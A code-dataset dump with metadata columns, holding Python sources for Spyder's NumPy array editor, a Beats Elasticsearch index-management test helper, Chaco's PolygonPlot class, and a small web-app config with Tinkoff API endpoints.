if self.total_cols > LARGE_COLS:
self.cols_loaded = self.COLS_TO_LOAD
else:
self.cols_loaded = self.total_cols
def get_format(self):
"""Return current format"""
# Avoid accessing the private attribute _format from outside
return self._format
def get_data(self):
"""Return data"""
return self._data
def set_format(self, format):
"""Change display format"""
self._format = format
self.reset()
def columnCount(self, qindex=QModelIndex()):
"""Array column number"""
if self.total_cols <= self.cols_loaded:
return self.total_cols
else:
return self.cols_loaded
def rowCount(self, qindex=QModelIndex()):
"""Array row number"""
if self.total_rows <= self.rows_loaded:
return self.total_rows
else:
return self.rows_loaded
def can_fetch_more(self, rows=False, columns=False):
if rows:
if self.total_rows > self.rows_loaded:
return True
else:
return False
if columns:
if self.total_cols > self.cols_loaded:
return True
else:
return False
def fetch_more(self, rows=False, columns=False):
if self.can_fetch_more(rows=rows):
reminder = self.total_rows - self.rows_loaded
items_to_fetch = min(reminder, self.ROWS_TO_LOAD)
self.beginInsertRows(QModelIndex(), self.rows_loaded,
self.rows_loaded + items_to_fetch - 1)
self.rows_loaded += items_to_fetch
self.endInsertRows()
if self.can_fetch_more(columns=columns):
reminder = self.total_cols - self.cols_loaded
items_to_fetch = min(reminder, self.COLS_TO_LOAD)
self.beginInsertColumns(QModelIndex(), self.cols_loaded,
self.cols_loaded + items_to_fetch - 1)
self.cols_loaded += items_to_fetch
self.endInsertColumns()
def bgcolor(self, state):
"""Toggle backgroundcolor"""
self.bgcolor_enabled = state > 0
self.reset()
def get_value(self, index):
i = index.row()
j = index.column()
if len(self._data.shape) == 1:
value = self._data[j]
else:
value = self._data[i, j]
return self.changes.get((i, j), value)
def data(self, index, role=Qt.DisplayRole):
"""Cell content"""
if not index.isValid():
return to_qvariant()
value = self.get_value(index)
if is_binary_string(value):
try:
value = to_text_string(value, 'utf8')
except:
pass
if role == Qt.DisplayRole:
if value is np.ma.masked:
return ''
else:
try:
return to_qvariant(self._format % value)
except TypeError:
self.readonly = True
return repr(value)
elif role == Qt.TextAlignmentRole:
return to_qvariant(int(Qt.AlignCenter|Qt.AlignVCenter))
elif role == Qt.BackgroundColorRole and self.bgcolor_enabled \
and value is not np.ma.masked:
try:
hue = (self.hue0 +
self.dhue * (float(self.vmax) - self.color_func(value))
/ (float(self.vmax) - self.vmin))
hue = float(np.abs(hue))
color = QColor.fromHsvF(hue, self.sat, self.val, self.alp)
return to_qvariant(color)
except TypeError:
return to_qvariant()
elif role == Qt.FontRole:
return to_qvariant(get_font(font_size_delta=DEFAULT_SMALL_DELTA))
return to_qvariant()
def setData(self, index, value, role=Qt.EditRole):
"""Cell content change"""
if not index.isValid() or self.readonly:
return False
i = index.row()
j = index.column()
value = from_qvariant(value, str)
dtype = self._data.dtype.name
if dtype == "bool":
try:
val = bool(float(value))
except ValueError:
val = value.lower() == "true"
elif dtype.startswith("string") or dtype.startswith("bytes"):
val = to_binary_string(value, 'utf8')
elif dtype.startswith("unicode") or dtype.startswith("str"):
val = to_text_string(value)
else:
if value.lower().startswith('e') or value.lower().endswith('e'):
return False
try:
val = complex(value)
if not val.imag:
val = val.real
except ValueError as e:
QMessageBox.critical(self.dialog, "Error",
"Value error: %s" % str(e))
return False
try:
self.test_array[0] = val # will raise an Exception eventually
except OverflowError as e:
print("OverflowError: " + str(e)) # spyder: test-skip
QMessageBox.critical(self.dialog, "Error",
"Overflow error: %s" % str(e))
return False
# Add change to self.changes
self.changes[(i, j)] = val
self.dataChanged.emit(index, index)
if not is_string(val):
if val > self.vmax:
self.vmax = val
if val < self.vmin:
self.vmin = val
return True
def flags(self, index):
"""Set editable flag"""
if not index.isValid():
return Qt.ItemIsEnabled
return Qt.ItemFlags(QAbstractTableModel.flags(self, index)|
Qt.ItemIsEditable)
def headerData(self, section, orientation, role=Qt.DisplayRole):
"""Set header data"""
if role != Qt.DisplayRole:
return to_qvariant()
labels = self.xlabels if orientation == Qt.Horizontal else self.ylabels
if labels is None:
return to_qvariant(int(section))
else:
return to_qvariant(labels[section])
def reset(self):
self.beginResetModel()
self.endResetModel()
class ArrayDelegate(QItemDelegate):
"""Array Editor Item Delegate"""
def __init__(self, dtype, parent=None):
QItemDelegate.__init__(self, parent)
self.dtype = dtype
def createEditor(self, parent, option, index):
"""Create editor widget"""
model = index.model()
value = model.get_value(index)
if model._data.dtype.name == "bool":
value = not value
model.setData(index, to_qvariant(value))
return
elif value is not np.ma.masked:
editor = QLineEdit(parent)
editor.setFont(get_font(font_size_delta=DEFAULT_SMALL_DELTA))
editor.setAlignment(Qt.AlignCenter)
if is_number(self.dtype):
validator = QDoubleValidator(editor)
validator.setLocale(QLocale('C'))
editor.setValidator(validator)
editor.returnPressed.connect(self.commitAndCloseEditor)
return editor
def commitAndCloseEditor(self):
"""Commit and close editor"""
editor = self.sender()
# Avoid a segfault with PyQt5. Variable value won't be changed
# but at least Spyder won't crash. It seems generated by a bug in sip.
try:
self.commitData.emit(editor)
except AttributeError:
pass
self.closeEditor.emit(editor, QAbstractItemDelegate.NoHint)
def setEditorData(self, editor, index):
"""Set editor widget's data"""
text = from_qvariant(index.model().data(index, Qt.DisplayRole), str)
editor.setText(text)
#TODO: Implement "Paste" (from clipboard) feature
class ArrayView(QTableView):
"""Array view class"""
def __init__(self, parent, model, dtype, shape):
QTableView.__init__(self, parent)
self.setModel(model)
self.setItemDelegate(ArrayDelegate(dtype, self))
total_width = 0
for k in range(shape[1]):
total_width += self.columnWidth(k)
self.viewport().resize(min(total_width, 1024), self.height())
self.shape = shape
self.menu = self.setup_menu()
config_shortcut(self.copy, context='variable_explorer', name='copy',
parent=self)
self.horizontalScrollBar().valueChanged.connect(
lambda val: self.load_more_data(val, columns=True))
self.verticalScrollBar().valueChanged.connect(
lambda val: self.load_more_data(val, rows=True))
def load_more_data(self, value, rows=False, columns=False):
try:
old_selection = self.selectionModel().selection()
old_rows_loaded = old_cols_loaded = None
if rows and value == self.verticalScrollBar().maximum():
old_rows_loaded = self.model().rows_loaded
self.model().fetch_more(rows=rows)
if columns and value == self.horizontalScrollBar().maximum():
old_cols_loaded = self.model().cols_loaded
self.model().fetch_more(columns=columns)
if old_rows_loaded is not None or old_cols_loaded is not None:
# if we've changed anything, update selection
new_selection = QItemSelection()
for part in old_selection:
top = part.top()
bottom = part.bottom()
if (old_rows_loaded is not None and
top == 0 and bottom == (old_rows_loaded-1)):
# complete column selected (so expand it to match
# updated range)
bottom = self.model().rows_loaded-1
left = part.left()
right = part.right()
if (old_cols_loaded is not None
and left == 0 and right == (old_cols_loaded-1)):
# compete row selected (so expand it to match updated
# range)
right = self.model().cols_loaded-1
top_left = self.model().index(top, left)
bottom_right = self.model().index(bottom, right)
part = QItemSelectionRange(top_left, bottom_right)
new_selection.append(part)
self.selectionModel().select
(new_selection, self.selectionModel().ClearAndSelect)
except NameError:
# Needed to handle a NameError while fetching data when closing
# See isue 7880
pass
def resize_to_contents(self):
"""Resize cells to contents"""
QApplication.setOverrideCursor(QCursor(Qt.WaitCursor))
self.resizeColumnsToContents()
self.model().fetch_more(columns=True)
self.resizeColumnsToContents()
QApplication.restoreOverrideCursor()
def setup_menu(self):
"""Setup context menu"""
self.copy_action = create_action(self, _('Copy'),
shortcut=keybinding('Copy'),
icon=ima.icon('editcopy'),
triggered=self.copy,
context=Qt.WidgetShortcut)
menu = QMenu(self)
add_actions(menu, [self.copy_action, ])
return menu
def contextMenuEvent(self, event):
"""Reimplement Qt method"""
self.menu.popup(event.globalPos())
event.accept()
def keyPressEvent(self, event):
"""Reimplement Qt method"""
if event == QKeySequence.Copy:
self.copy()
else:
QTableView.keyPressEvent(self, event)
def _sel_to_text(self, cell_range):
"""Copy an array portion to a unicode string"""
if not cell_range:
return
row_min, row_max, col_min, col_max = get_idx_rect(cell_range)
if col_min == 0 and col_max == (self.model().cols_loaded-1):
# we've selected a whole column. It isn't possible to
# select only the first part of a column without loading more,
# so we can treat it as intentional and copy the whole thing
col_max = self.model().total_cols-1
if row_min == 0 and row_max == (self.model().rows_loaded-1):
row_max = self.model().total_rows-1
_data = self.model().get_data()
if PY3:
output = io.BytesIO()
else:
output = io.StringIO()
try:
np.savetxt(output, _data[row_min:row_max+1, col_min:col_max+1],
delimiter='\t', fmt=self.model().get_format())
except:
QMessageBox.warning(self, _("Warning"),
_("It was not possible to copy values for "
"this array"))
return
contents = output.getvalue().decode('utf-8')
output.close()
return contents
@Slot()
def copy(self):
"""Copy text to clipboard"""
cliptxt = self._sel_to_text( self.selectedIndexes() )
clipboard = QApplication.clipboard()
clipboard.setText(cliptxt)
class ArrayEditorWidget(QWidget):
def __init__(self, parent, data, readonly=False,
xlabels=None, ylabels=None):
QWidget.__init__(self, parent)
self.data = data
self.old_data_shape = None
if len(self.data.shape) == 1:
self.old_data_shape = self.data.shape
self.data.shape = (self.data.shape[0], 1)
elif len(self.data.shape) == 0:
self.old_data_shape = self.data.shape
self.data.shape = (1, 1)
format = SUPPORTED_FORMATS.get(data.dtype.name, '%s')
self.model = ArrayModel(self.data, format=format, xlabels=xlabels,
ylabels=ylabels, readonly=readonly, parent=self)
self.view = ArrayView(self, self.model, data.dtype, data.shape)
btn_layout = QHBoxLayout()
btn_layout.setAlignment(Qt.AlignLeft)
btn = QPushButton(_( "Format"))
# disable format button for int type
btn.setEnabled(is_float(data.dtype))
btn_layout.addWidget(btn)
btn.clicked.connect(self.change_format)
btn = QPushButton(_( "Resize"))
btn_layout.addWidget(btn)
btn.clicked.connect(self.view.resize_to_contents)
bgcolor = QCheckBox(_( 'Background color'))
bgcolor.setChecked(self.model.bgcolor_enabled)
bgcolor.setEnabled(self.model.bgcolor_enabled)
bgcolor.stateChanged.connect(self.model.bgcolor)
btn_layout.addWidget(bgcolor)
layout = QVBoxLayout()
layout.addWidget(self.view)
layout.addLayout(btn_layout)
self.setLayout(layout)
def accept_changes(self):
"""Accept changes"""
for (i, j), value in list(self.model.changes.items()):
self.data[i, j] = value
if self.old_data_shape is not None:
self.data.shape = self.old_data_shape
def reject_changes(self):
"""Reject changes"""
if self.old_data_shape is not None:
self.data.shape = self.old_data_shape
def change_format(self):
"""Change display format"""
format, valid = QInputDialog.getText(self, _( 'Format'),
_( "Float formatting"),
QLineEdit.Normal, self.model.get_format())
if valid:
format = str(format)
try:
format % 1.1
except:
QMessageBox.critical(self, _("Error"),
_("Format (%s) is incorrect") % format)
return
self.model.set_format(format)
class ArrayEditor(QDialog):
"""Array Editor Dialog"""
def __init__(self, parent=None):
QDialog.__init__(self, parent)
# Destroying the C++ object right after closing the dialog box,
# otherwise it may be garbage-collected in another QThread
# (e.g. the editor's analysis thread in Spyder), thus leading to
# a segmentation fault on UNIX or an application crash on Windows
self.setAttribute(Qt.WA_DeleteOnClose)
self.data = None
self.arraywidget = None
self.stack = None
self.layout = None
self.btn_save_and_close = None
self.btn_close = None
# Values for 3d array editor
self.dim_indexes = [{}, {}, {}]
self.last_dim = 0 # Adjust this for changing the startup dimension
def setup_and_check(self, data, title='', readonly=False,
xlabels=None, ylabels=None):
"""
Setup ArrayEditor:
return False if data is not supported, True otherwise
"""
self.data = data
readonly = readonly or not self.data.flags.writeable
is_record_array = data.dtype.names is not None
is_masked_array = isinstance(data, np.ma.MaskedArray)
if data.ndim > 3:
self.error(_("Arrays with more than 3 dimensions are not "
"supported"))
return False
if xlabels is not None and len(xlabels) != self.data.shape[1]:
self.error(_("The 'xlabels' argument length do no match array "
"column number"))
return False
if ylabels is not None and len(ylabels) != self.data.shape[0]:
self.error(_("The 'ylabels' argument length do no match array row "
"number"))
return False
if not is_record_array:
dtn = data.dtype.name
if dtn not in SUPPORTED_FORMATS and not dtn.startswith('str') \
and not dtn.startswith('unicode'):
arr = _("%s arrays") % data.dtype.name
self.error(_("%s are currently not supported") % arr)
return False
self.layout = QGridLayout()
self.setLayout(self.layout)
self.setWindowIcon(ima.icon('arredit'))
if title:
title = to_text_string(title) + " - " + _("NumPy array")
else:
title = _("Array editor")
if readonly:
title += ' (' + _('read only') + ')'
self.setWindowTitle(title)
self.resize(600, 500)
# Stack widget
self.stack = QStackedWidget(self)
if is_record_array:
for name in data.dtype.names:
self.stack.addWidget(ArrayEditorWidget(self, data[name],
readonly, xlabels, ylabels))
elif is_masked_array:
self.stack.addWidget(ArrayEditorWidget(self, data, readonly,
xlabels, ylabels))
self.stack.addWidget(ArrayEditorWidget(self, data.data, readonly,
xlabels, ylabels))
self.stack.addWidget(ArrayEditorWidget(self, data.mask, readonly,
xlabels, ylabels))
elif data.ndim == 3:
pass
else:
self.stack.addWidget(ArrayEditorWidget(self, data, readonly,
xlabels, ylabels))
self.arraywidget = self.stack.currentWidget()
if self.arraywidget:
self.arraywidget.model.dataChanged.connect(
self.save_and_close_enable)
self.stack.currentChanged.connect(self.current_widget_changed)
self.layout.addWidget(self.stack, 1, 0)
# Buttons configuration
btn_layout = QHBoxLayout()
if is_record_array or is_masked_array or data.ndim == 3:
if is_record_array:
btn_layout.addWidget(QLabel(_("Record array fields:")))
names = []
for name in data.dtype.names:
field = data.dtype.fields[name]
text = name
if len(field) >= 3:
title = field[2]
if not is_text_string(title):
title = repr(title)
text += ' - '+title
names.append(text)
else:
names = [_('Masked data'), _('Data'), _('Mask')]
if data.ndim == 3:
# QSpinBox
self.index_spin = QSpinBox(self, keyboardTracking=False)
self.index_spin.valueChanged.connect(self.change_active_widget)
# QComboBox
names = [str(i) for i in range(3)]
ra_combo = QComboBox(self)
ra_combo.addItems(names)
ra_combo.currentIndexChanged.connect(self.current_dim_changed)
# Adding the widgets to layout
label = QLabel(_("Axis:"))
btn_layout.addWidget(label)
btn_layout.addWidget(ra_combo)
self.shape_label = QLabel()
btn_layout.addWidget(self.shape_label)
label = QLabel(_("Index:"))
btn_layout.addWidget(label)
btn_layout.addWidget(self.index_spin)
self.slicing_label = QLabel()
btn_layout.addWidget(self.slicing_label)
# set the widget to display when launched
self.current_dim_changed(self.last_dim)
else:
ra_combo = QComboBox(self)
ra_combo.currentIndexChanged.connect(self.stack.setCurrentIndex)
ra_combo.addItems(names)
btn_layout.addWidget(ra_combo)
if is_masked_array:
label = QLabel(_("<u>Warning</u>: changes are applied separately"))
label.setToolTip(_("For performance reasons, changes applied "\
"to masked array won't be reflected in "\
"array's data (and vice-versa)."))
btn_layout.addWidget(label)
btn_layout.addStretch()
if not readonly:
self.btn_save_and_close = QPushButton(_('Save and Close'))
self.btn_save_and_close.setDisabled(True)
self.btn_save_and_close.clicked.connect(self.accept)
btn_layout.addWidget(self.btn_save_and_close)
self.btn_close = QPushButton(_('Close'))
self.btn_close.setAutoDefault(True)
self.btn_close.setDefault(True)
self.btn_close.clicked.connect(self.reject)
btn_layout.addWidget(self.btn_close)
self.layout.addLayout(btn_layout, 2, 0)
self.setMinimumSize(400, 300)
# Make the dialog act as a window
self.setWindowFlags(Qt.Window)
return True
@Slot(QModelIndex, QModelIndex)
def save_and_close_enable(self, left_top, bottom_right):
"""Handle the data change event to enable the save and close button."""
if self.btn_save_and_close:
self.btn_save_and_close.setEnabled(True)
self.btn_save_and_close.setAutoDefault(True)
self.btn_save_and_close.setDefault(True)
def current_widget_changed(self, index):
self.arraywidget = self.stack.widget(index)
self.arraywidget.model.dataChanged.connect(self.save_and_close_enable)
def change_active_widget(self, index):
"""
This is implemented for handling negative values in index for
3d arrays, to give the same behavior as slicing
"""
string_index = [':']*3
string_index[self.last_dim] = '<font color=red>%i</font>'
self.slicing_label.setText((r"Slicing: [" + ", ".join(string_index) +
"]") % index)
if index < 0:
data_index = self.data.shape[self.last_dim] + index
else:
data_index = index
slice_index = [slice(None)]*3
slice_index[self.last_dim] = data_index
stack_index = self.dim_indexes[self.last_dim].get(data_index)
if stack_index is None:
stack_index = self.stack.count()
try:
self.stack.addWidget(ArrayEditorWidget(
self, self.data[tuple(slice_index)]))
except IndexError: # Handle arrays of size 0 in one axis
self.stack.addWidget(ArrayEditorWidget(self, self.data))
self.dim_indexes[self.last_dim][data_index] = stack_index
self.stack.update()
self.stack.setCurrentIndex(stack_index)
def current_dim_changed(self, index):
"""
This change the active axis the array editor is plotting over
in 3D
"""
self.last_dim = index
string_size = ['%i']*3
string_size[index] = '<font color=red>%i</font>'
self.shape_label.setText(('Shape: (' + ', '.join(string_size) +
') ') % self.data.shape)
if self.index_spin.value() != 0:
self.index_spin.setValue(0)
else:
# this is done since if the value is currently 0 it does not emit
# currentIndexChanged(int)
self.change_active_widget(0)
self.index_spin.setRange(-self.data.shape[index],
self.data.shape[index]-1)
@Slot()
def accept(self):
"""Reimplement Qt method"""
for index in range(self.stack.count()):
self.stack.widget(index).accept_changes()
QDialog.accept(self)
def get_value(self):
"""Return modified array -- this is *not* a copy"""
# It is import to avoid accessing Qt C++ object as it has probably
# already been destroyed, due to the Qt.WA_DeleteOnClose attribute
return self.data
def error(self, message):
"""An error occured, closing the dialog box"""
QMessageBox.critical(self, _("Array editor"), message)
self.setAttribute(Qt.WA_DeleteOnClose)
self.reject()
@Slot()
def reject(self):
"""Reimplement Qt method"""
if self.arraywidget is not None:
for index in range(self.stack.count()):
self.stack.widget(index).reject_changes()
QDialog.reject(self)
| 39.817217
| 84
| 0.53206
| 3,540
| 33,765
| 4.926836
| 0.180226
| 0.017889
| 0.013417
| 0.007224
| 0.207672
| 0.160197
| 0.102632
| 0.080901
| 0.043575
| 0.038186
| 0
| 0.008448
| 0.361943
| 33,765
| 847
| 85
| 39.864227
| 0.801058
| 0.107449
| 0
| 0.187017
| 0
| 0
| 0.043203
| 0
| 0
| 0
| 0
| 0.001181
| 0
| 1
| 0.068006
| false
| 0.006182
| 0.018547
| 0
| 0.16847
| 0.003091
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
864d134a9c98ae3913986fb31b160d825e4250a2
| 4,638
|
py
|
Python
|
libbeat/tests/system/idxmgmt.py
|
dddpaul/beats
|
0d4a830fea46210ee264c52a977834d39493c750
|
[
"ECL-2.0",
"Apache-2.0"
] | 4
|
2020-11-17T06:29:30.000Z
|
2021-08-08T11:56:01.000Z
|
libbeat/tests/system/idxmgmt.py
|
dddpaul/beats
|
0d4a830fea46210ee264c52a977834d39493c750
|
[
"ECL-2.0",
"Apache-2.0"
] | 6
|
2020-06-23T16:28:27.000Z
|
2020-10-05T17:52:01.000Z
|
libbeat/tests/system/idxmgmt.py
|
dddpaul/beats
|
0d4a830fea46210ee264c52a977834d39493c750
|
[
"ECL-2.0",
"Apache-2.0"
] | 2
|
2020-10-26T15:34:06.000Z
|
2021-12-10T08:51:58.000Z
|
import datetime
import unittest
import pytest
from elasticsearch import NotFoundError
class IdxMgmt(unittest.TestCase):
def __init__(self, client, index):
self._client = client
self._index = index if index != '' and index != '*' else 'mockbeat'
def needs_init(self, s):
return s == '' or s == '*'
def delete(self, indices=[], policies=[]):
indices = list([x for x in indices if x != ''])
if not indices:
indices == [self._index]
for i in indices:
self.delete_index_and_alias(i)
self.delete_template(template=i)
for i in [x for x in policies if x != '']:
self.delete_policy(i)
def delete_index_and_alias(self, index=""):
if self.needs_init(index):
index = self._index
try:
self._client.transport.perform_request('DELETE', "/" + index + "*")
except NotFoundError:
pass
def delete_template(self, template=""):
if self.needs_init(template):
template = self._index
try:
self._client.transport.perform_request('DELETE', "/_template/" + template + "*")
except NotFoundError:
pass
def delete_policy(self, policy):
# Delete any existing policy starting with given policy
policies = self._client.transport.perform_request('GET', "/_ilm/policy")
for p, _ in policies.items():
if not p.startswith(policy):
continue
try:
self._client.transport.perform_request('DELETE', "/_ilm/policy/" + p)
except NotFoundError:
pass
def assert_index_template_not_loaded(self, template):
with pytest.raises(NotFoundError):
self._client.transport.perform_request('GET', '/_template/' + template)
def assert_index_template_loaded(self, template):
resp = self._client.transport.perform_request('GET', '/_template/' + template)
assert template in resp
assert "lifecycle" not in resp[template]["settings"]["index"]
def assert_ilm_template_loaded(self, template, policy, alias):
resp = self._client.transport.perform_request('GET', '/_template/' + template)
assert resp[template]["settings"]["index"]["lifecycle"]["name"] == policy
assert resp[template]["settings"]["index"]["lifecycle"]["rollover_alias"] == alias
def assert_index_template_index_pattern(self, template, index_pattern):
resp = self._client.transport.perform_request('GET', '/_template/' + template)
assert template in resp
assert resp[template]["index_patterns"] == index_pattern
def assert_alias_not_created(self, alias):
resp = self._client.transport.perform_request('GET', '/_alias')
for name, entry in resp.items():
if alias not in name:
continue
assert entry["aliases"] == {}, entry["aliases"]
def assert_alias_created(self, alias, pattern=None):
if pattern is None:
pattern = self.default_pattern()
name = alias + "-" + pattern
resp = self._client.transport.perform_request('GET', '/_alias/' + alias)
assert name in resp
assert resp[name]["aliases"][alias]["is_write_index"] == True
def assert_policy_not_created(self, policy):
with pytest.raises(NotFoundError):
self._client.transport.perform_request('GET', '/_ilm/policy/' + policy)
def assert_policy_created(self, policy):
resp = self._client.transport.perform_request('GET', '/_ilm/policy/' + policy)
assert policy in resp
assert resp[policy]["policy"]["phases"]["hot"]["actions"]["rollover"]["max_size"] == "50gb"
assert resp[policy]["policy"]["phases"]["hot"]["actions"]["rollover"]["max_age"] == "30d"
def assert_docs_written_to_alias(self, alias, pattern=None):
# Refresh the indices to guarantee all documents are available
# through the _search API.
self._client.transport.perform_request('POST', '/_refresh')
if pattern is None:
pattern = self.default_pattern()
name = alias + "-" + pattern
data = self._client.transport.perform_request('GET', '/' + name + '/_search')
self.assertGreater(data["hits"]["total"]["value"], 0)
def default_pattern(self):
d = datetime.datetime.now().strftime("%Y.%m.%d")
return d + "-000001"
def index_for(self, alias, pattern=None):
if pattern is None:
pattern = self.default_pattern()
return "{}-{}".format(alias, pattern)
| 39.305085
| 99
| 0.618586
| 525
| 4,638
| 5.262857
| 0.2
| 0.057908
| 0.096272
| 0.131741
| 0.446978
| 0.411871
| 0.372059
| 0.355411
| 0.294607
| 0.198335
| 0
| 0.003158
| 0.24903
| 4,638
| 117
| 100
| 39.641026
| 0.790123
| 0.02997
| 0
| 0.282609
| 0
| 0
| 0.101224
| 0
| 0
| 0
| 0
| 0
| 0.23913
| 1
| 0.184783
| false
| 0.032609
| 0.043478
| 0.01087
| 0.271739
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
864d964c990a587e44dea52d446ea4e2f4b1a45e
| 6,340
|
py
|
Python
|
chaco/polygon_plot.py
|
burnpanck/chaco
|
6457cdd28625991ba69fbbee105051cab237aa51
|
[
"BSD-3-Clause"
] | 3
|
2017-09-17T17:32:06.000Z
|
2022-03-15T13:04:43.000Z
|
chaco/polygon_plot.py
|
burnpanck/chaco
|
6457cdd28625991ba69fbbee105051cab237aa51
|
[
"BSD-3-Clause"
] | null | null | null |
chaco/polygon_plot.py
|
burnpanck/chaco
|
6457cdd28625991ba69fbbee105051cab237aa51
|
[
"BSD-3-Clause"
] | 5
|
2015-05-17T16:08:11.000Z
|
2021-02-23T09:23:42.000Z
|
""" Defines the PolygonPlot class.
"""
from __future__ import with_statement
# Major library imports
import numpy as np
# Enthought library imports.
from enable.api import LineStyle, black_color_trait, \
transparent_color_trait
from kiva.agg import points_in_polygon
from traits.api import Enum, Float, Tuple, Property, cached_property, \
on_trait_change
# Local imports.
from base_xy_plot import BaseXYPlot
class PolygonPlot(BaseXYPlot):
""" Plots a polygon in dataspace.
Assuming that the index and value mappers are linear mappers, and that
"index" corresponds to X-coordinates and "value" corresponds to
Y-coordinates, the points are arranged in a counter-clockwise fashion.
The polygon is closed automatically, so there is no need to reproduce
the first point as the last point.
Nonlinear mappers are possible, but the results may be unexpected. Only the
data-space points are mapped in a nonlinear fashion. Straight lines
connecting them in a linear screen-space become curved in a nonlinear
screen-space; however, the drawing still contains straight lines in
screen-space.
If you don't want the edge of the polygon to be drawn, set **edge_color**
to transparent; don't try to do this by setting **edge_width** to 0. In
some drawing systems, such as PostScript, a line width of 0 means to make
the line as small as possible while still putting ink on the page.
"""
# The color of the line on the edge of the polygon.
edge_color = black_color_trait
# The thickness of the edge of the polygon.
edge_width = Float(1.0)
# The line dash style for the edge of the polygon.
edge_style = LineStyle
# The color of the face of the polygon.
face_color = transparent_color_trait
# Override the hittest_type trait inherited from BaseXYPlot
hittest_type = Enum("poly", "point", "line")
# The RGBA tuple for rendering edges. It is always a tuple of length 4.
# It has the same RGB values as edge_color_, and its alpha value is the
# alpha value of self.edge_color multiplied by self.alpha.
effective_edge_color = Property(Tuple, depends_on=['edge_color', 'alpha'])
# The RGBA tuple for rendering the face. It is always a tuple of length 4.
# It has the same RGB values as face_color_, and its alpha value is the
# alpha value of self.face_color multiplied by self.alpha.
effective_face_color = Property(Tuple, depends_on=['face_color', 'alpha'])
#----------------------------------------------------------------------
# Private 'BaseXYPlot' interface
#----------------------------------------------------------------------
def _gather_points(self):
""" Collects the data points that are within the bounds of the plot and
caches them.
"""
if self._cache_valid:
return
index = self.index.get_data()
value = self.value.get_data()
if not self.index or not self.value:
return
if len(index) == 0 or len(value) == 0 or len(index) != len(value):
self._cached_data_pts = []
self._cache_valid = True
return
points = np.transpose(np.array((index,value)))
self._cached_data_pts = points
self._cache_valid = True
def _render(self, gc, points):
""" Renders an Nx2 array of screen-space points as a polygon.
"""
with gc:
gc.clip_to_rect(self.x, self.y, self.width, self.height)
gc.set_stroke_color(self.effective_edge_color)
gc.set_line_width(self.edge_width)
gc.set_line_dash(self.edge_style_)
gc.set_fill_color(self.effective_face_color)
gc.lines(points)
gc.close_path()
gc.draw_path()
def _render_icon(self, gc, x, y, width, height):
""" Renders a representation of this plot as an icon into the box
defined by the parameters.
Used by the legend.
"""
with gc:
gc.set_stroke_color(self.effective_edge_color)
gc.set_line_width(self.edge_width)
gc.set_fill_color(self.effective_face_color)
if hasattr(self, 'line_style_'):
gc.set_line_dash(self.line_style_)
gc.draw_rect((x,y,width,height))
return
def hittest(self, screen_pt, threshold=7.0, return_distance=False):
""" Performs point-in-polygon testing or point/line proximity testing.
If self.hittest_type is "line" or "point", then behaves like the
parent class BaseXYPlot.hittest().
If self.hittest_type is "poly", then returns True if the given
point is inside the polygon, and False otherwise.
"""
if self.hittest_type in ("line", "point"):
return BaseXYPlot.hittest(self, screen_pt, threshold, return_distance)
data_pt = self.map_data(screen_pt, all_values=True)
index = self.index.get_data()
value = self.value.get_data()
poly = np.vstack((index,value)).T
if points_in_polygon([data_pt], poly)[0] == 1:
return True
else:
return False
#------------------------------------------------------------------------
# Event handlers
#------------------------------------------------------------------------
@on_trait_change('edge_color, edge_width, edge_style, face_color, alpha')
def _attributes_changed(self):
self.invalidate_draw()
self.request_redraw()
#------------------------------------------------------------------------
# Property getters
#------------------------------------------------------------------------
@cached_property
def _get_effective_edge_color(self):
if len(self.edge_color_) == 4:
edge_alpha = self.edge_color_[-1]
else:
edge_alpha = 1.0
c = self.edge_color_[:3] + (edge_alpha * self.alpha,)
return c
@cached_property
def _get_effective_face_color(self):
if len(self.face_color_) == 4:
face_alpha = self.face_color_[-1]
else:
face_alpha = 1.0
c = self.face_color_[:3] + (face_alpha * self.alpha,)
return c
| 36.647399
| 82
| 0.603312
| 828
| 6,340
| 4.43599
| 0.266908
| 0.031854
| 0.016335
| 0.013068
| 0.288048
| 0.166077
| 0.128233
| 0.128233
| 0.109992
| 0.109992
| 0
| 0.004871
| 0.255205
| 6,340
| 172
| 83
| 36.860465
| 0.772978
| 0.424606
| 0
| 0.3125
| 0
| 0
| 0.033682
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.0875
| false
| 0
| 0.075
| 0
| 0.375
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
86502380f0447c4c5893fb4c09f732239b1cc11f
| 552
|
py
|
Python
|
webapp/template_config.py
|
evgenyss/investing
|
b72da8587a4783bfdd389f1781dcd108d1a5e53f
|
[
"MIT"
] | null | null | null |
webapp/template_config.py
|
evgenyss/investing
|
b72da8587a4783bfdd389f1781dcd108d1a5e53f
|
[
"MIT"
] | null | null | null |
webapp/template_config.py
|
evgenyss/investing
|
b72da8587a4783bfdd389f1781dcd108d1a5e53f
|
[
"MIT"
] | null | null | null |
import os
from datetime import timedelta
basedir = os.path.abspath(os.path.dirname(__file__))
API_DATA_URL = "https://invest-public-api.tinkoff.ru/rest/tinkoff.public.invest.api.contract.v1.InstrumentsService/"
API_LASTPRICES_URL = "https://invest-public-api.tinkoff.ru/rest/\
tinkoff.public.invest.api.contract.v1.MarketDataService/GetLastPrices"
SQLALCHEMY_DATABASE_URI = 'sqlite:///' + os.path.join(basedir, '..', 'webapp.db')
REMEMBER_COOKIE_DURATION = timedelta(days=1)
SQLALCHEMY_TRACK_MODIFICATIONS = False
SECRET_KEY = ""
API_TOKEN = ""
| 29.052632
| 116
| 0.778986
| 73
| 552
| 5.671233
| 0.589041
| 0.043478
| 0.067633
| 0.096618
| 0.328502
| 0.328502
| 0.328502
| 0.328502
| 0.328502
| 0.328502
| 0
| 0.005882
| 0.076087
| 552
| 18
| 117
| 30.666667
| 0.805882
| 0
| 0
| 0
| 0
| 0.090909
| 0.217391
| 0
| 0
| 0
